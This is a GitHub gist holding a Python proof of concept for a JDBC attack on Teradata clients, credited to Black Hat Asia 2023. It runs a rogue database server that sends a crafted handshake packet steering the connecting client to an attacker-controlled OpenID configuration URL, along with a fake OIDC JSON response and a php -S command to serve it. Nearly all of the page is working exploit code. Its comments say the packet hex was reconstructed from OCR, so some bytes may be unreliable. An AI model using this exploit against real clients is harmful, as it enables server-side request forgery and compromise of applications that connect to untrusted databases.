Created
June 1, 2023 11:21
-
-
Save kaiili/c1b8fb766ac424ea3e48b510efcf3e2f to your computer and use it in GitHub Desktop.
JDBC 攻击teradata 的 POC, 来自 blackhat ASIA 2023
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import struct | |
import asyncio | |
# JDBC 客户端会去请求的地址 | |
# 最终的请求: http://127.0.0.1:1881/.well-known/openid-configuration | |
url = "http://127.0.0.1:1881/" | |
# 自动化拼接字符串 | |
# 0x 是占位符, 大量的数据来自 OCR, 为了对齐缺少的行 | |
def merge_strings(arr: list) -> str: | |
result = "" | |
for i in range(len(arr[0])): | |
current = "" | |
for j in range(len(arr)): | |
if arr[j][i] != "0x": | |
current += arr[j][i] | |
result += current | |
return result | |
# OCR 出来的流量数据, | |
# 预期的获取渠道是官方文档,或者通过生产环境抓包获取 | |
# 因为(1 官方文档不好用 (2 虚拟机只有 x86 的,所以抄作业了 | |
s_list = [ | |
[ | |
"0x", | |
"000000002b024e000003", | |
"20202020202020202020", | |
"2020204e010001000154", | |
"00f23000007918000000", | |
"01000a001c0101010101", | |
"0101000d003e31372e32", | |
"28010000010001010000", | |
], | |
[ | |
"0x", | |
"e8000003e80078000177ff00000002", | |
"2020202020202020f1004153434949", | |
"0007008c310000640000fa00000f42", | |
"260000fa000000fa000000fa000000", | |
"010102010001010001010101020101", | |
"302e30332e30392020202020202020", | |
"010100000100010001000100000000", | |
], | |
[ | |
"0x", | |
"00000001ff000004be005554463136", | |
"202020202020202020202020202020", | |
"40000000007cff06000070000000ff", | |
"7d0000007d000000fa000000fa0000", | |
"0001010101010102000b0022010101", | |
"202020202020202020202031372e32", | |
"000000000000000101000100010000", | |
], | |
[ | |
"0000000000000000000", | |
"2020202020202020202", | |
"2020202020202020202", | |
"f80000000100000000b", | |
"0009e70000000600000", | |
"0101000101010101010", | |
"302e30332e303920202", | |
"0100100014000000000", | |
], | |
[ | |
"000000000000000000000000100000", | |
"020202020202020202020202020202", | |
"0c0004542434449432020202020202", | |
"f000000100000ffff0000080000000", | |
"00600000006000003e8000fa00000f", | |
"201010101010101000101010101010", | |
"020202020202020202020202020202", | |
"000000000008002000000000000000", | |
], | |
[ | |
"00005ff0000000000000000000000", | |
"0bf00555446382020202020202020", | |
"02020202020202020202020202020", | |
"08000000040000009e7000fa00000", | |
"ffc00000fffb40000fa0000090001", | |
"1010001010000000c000601000102", | |
"0202020000e000403030203000f00", | |
"00012002001010101010101010000", | |
], | |
] | |
packet_to_send = ( | |
bytes.fromhex("03020a0000070000") | |
+ struct.pack(">H", len(url) + 899) | |
+ bytes.fromhex( | |
merge_strings(s_list) | |
+ "0000000000000000000000000000000000000000000000130008010101000000000000060002014900a5" | |
) | |
+ struct.pack(">H", len(url) + 87) | |
+ bytes.fromhex( | |
"0000000100010005010002000811140309000300040004000600210006000400050004000700040008000400090004000a000501000b000501000c000501000e0004001000060100000f" | |
) | |
+ struct.pack(">H", len(url) + 11) | |
+ bytes.fromhex("000372636500") | |
+ struct.pack("B", len(url)) | |
+ url.encode("ascii") | |
+ bytes.fromhex( | |
"00a70031000000010000000d2b06010401813f0187740101090010000c00000003000000010011000c000000010000001400a70024000000010000000c2b06010401813f01877401140011000c000000010000004600a7002100000001000000092a864886f7120102020011000c000000010000002800a7001e00000001000000062b06010505020011000c000000010000004100a70025000000010000000d2b0601040181e01a04822e01040011000c000000010000001e00a70025000000010000000d2b0601040181e01a04822e01030011000c000000010000000a" | |
) | |
) | |
async def handle_connection(reader, writer): | |
writer.write(packet_to_send) | |
await writer.drain() | |
await reader.read(10) | |
writer.write(packet_to_send) | |
await writer.drain() | |
writer.close() | |
# 需要搭配一个返回成功 json使用 | |
# 我使用的 result.json + PHP快速启动一个服务, 命令如下: | |
# php -S 0.0.0.0:1881 result.json | |
async def main(): | |
server = await asyncio.start_server(handle_connection, "localhost", 1025) | |
async with server: | |
await server.serve_forever() | |
asyncio.run(main()) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
{ | |
"authorization_endpoint":"a", | |
"token_endpoint":"2" | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment